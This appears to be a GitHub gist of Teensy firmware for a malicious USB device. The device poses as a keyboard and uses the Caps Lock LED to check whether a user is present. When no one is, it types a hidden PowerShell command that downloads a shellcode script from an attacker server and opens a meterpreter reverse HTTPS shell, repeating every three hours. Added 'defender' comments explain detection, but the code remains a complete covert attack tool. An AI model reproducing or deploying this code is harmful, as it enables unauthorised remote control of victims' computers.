@coldfusion39
Last active May 19, 2017 05:55
Teensy code for backdooring USB devices
// Copyright (c) 2017, Brandan Geise [coldfusion]
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in all
// copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
// SOFTWARE.
#include "usb_private.h"
#include "usb_api.h"
// Pin number 11 kept in a global; nothing in the visible sketch reads it.
int ledPin = 11;
// Startup hook (runs once before loop() in the Arduino/Teensyduino model).
// It only blocks for a fixed 120000 ms, so the board sends no keystrokes for
// the first two minutes after it is powered. When correlating a USB
// insertion event with later keyboard activity, expect at least this gap.
void setup() {
    const unsigned long kStartupDelayMs = 120000UL;  // 2 min
    delay(kStartupDelayMs);
}
// Main loop. Uses the host's Caps Lock LED state as a presence tripwire:
// Caps Lock is switched on, then polled ten times. If any poll finds it off
// again, the sketch goes quiet for an hour; otherwise it types a command
// line into the host through UserCmd() and then sleeps for three hours.
void loop() {
delay(2000); // Pause before each presence check
if (!IsCapsOn()){send_caps();} // Switch Caps Lock on if it is off; it serves as the tripwire
// Number of polls in which Caps Lock was found off
int userState = 0;
for (int m=9; m>=0; m--) { // 10 polls; approx 60 sec in total when Caps Lock stays on
delay(3000); // Delay before each Caps Lock poll
if (IsCapsOn()) {
delay(3000); // Still on: wait a further 3 s
} else {
// The LED state no longer shows Caps Lock and the sketch sends no key in
// this loop, so the change is treated as a sign that someone is at the keyboard.
userState = userState + 1;
}
}
if (userState > 0) {
delay(3600000); // Activity seen: stay silent for 60 min
} else {
// No activity seen during the polling window: keystroke injection starts here.
// Ctrl, then Ctrl+Alt -- presumably to wake the display; the sketch does not say.
ctrl_alt();
// Caps Lock was on for every poll, so this toggles it off again before typing.
send_caps();
min_windows();
delay(500);
// NOTE(defender): the string below is typed into a cmd.exe prompt. It starts
// PowerShell with an execution-policy bypass, hidden window and no profile,
// fetches a script over plain HTTP with Net.WebClient.DownloadString and runs
// it via IEX. YOUR_SERVER and YOUR_IP are unfilled placeholders.
// Process-creation logging with command lines and PowerShell script block
// logging record this invocation. Restricting which USB HID devices the
// host accepts removes the injection path.
UserCmd("powershell -ep bypass -w hidden -nop -c IEX (New-Object Net.WebClient).DownloadString('http://YOUR_SERVER.com/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost YOUR_IP -Lport 443 -Force");
delay(10800000); // 3 hours before the whole sequence can run again
}
}
// Types a command line into the host in the logged-in user's session.
// Sequence: tap the GUI (Windows) key, type "cmd.exe" + Enter, type Payload
// + Enter, then call max_windows().
//   Payload: C string handed unchanged to Keyboard.print.
// The steps are separated by fixed 500 ms pauses; nothing verifies that a
// prompt opened or has keyboard focus, so the text lands in whatever window
// is focused at that moment.
// NOTE(defender): on the host this appears as cmd.exe launched interactively
// from the Start menu, followed by whatever process Payload starts.
void UserCmd(char *Payload) {
// Press the GUI key on its own, then release everything
Keyboard.set_modifier(MODIFIERKEY_GUI);
Keyboard.send_now();
release_keys();
delay(500);
Keyboard.print("cmd.exe");
send_enter();
delay(500);
Keyboard.print(Payload);
delay(500);
send_enter();
delay(500);
// GUI+Shift+M: presumably restores the windows minimised by the caller
max_windows();
}
// Returns the current value of keyboard_leds converted to int.
// keyboard_leds is declared outside this file (presumably in usb_private.h)
// and is used here as the keyboard LED state reported by the host.
int ledkeys(void) {
    return static_cast<int>(keyboard_leds);
}
// Reports whether Caps Lock is on according to the LED value from ledkeys().
// Only the values 2, 3, 6 and 7 count as "on": these are the values of a
// three-bit mask that have bit 1 set. ledkeys() is re-read for each
// comparison, exactly as many times as short-circuit evaluation requires.
boolean IsCapsOn() {
    return ledkeys() == 2 || ledkeys() == 3 || ledkeys() == 6 || ledkeys() == 7;
}
// Releases everything: clears key slot 1 and all modifiers, sends that empty
// report to the host, then waits 100 ms.
void release_keys() {
Keyboard.set_key1(0);
Keyboard.set_modifier(0);
Keyboard.send_now();
delay(100);
}
// Sends Right-GUI + Shift + M, then releases all keys.
// On Windows this chord restores minimised windows.
void max_windows() {
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_SHIFT);
Keyboard.set_key1(KEY_M);
Keyboard.send_now();
release_keys();
}
// Sends Right-GUI + M, then releases all keys.
// On Windows this chord minimises all windows.
void min_windows() {
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
Keyboard.set_key1(KEY_M);
Keyboard.send_now();
release_keys();
}
// Taps the Caps Lock key once (press, then release via release_keys()).
// This toggles the state; it does not set Caps Lock to a particular value.
void send_caps() {
Keyboard.set_key1(KEY_CAPS_LOCK);
Keyboard.send_now();
release_keys();
}
// Taps the Enter key once (press, then release via release_keys()).
void send_enter() {
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
release_keys();
}
// Presses Ctrl, then Ctrl+Alt as a second report, then releases everything.
// No ordinary key is sent with the modifiers. The purpose is not stated in
// the sketch -- presumably it generates harmless input before the typing begins.
void ctrl_alt() {
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);
Keyboard.send_now();
release_keys();
}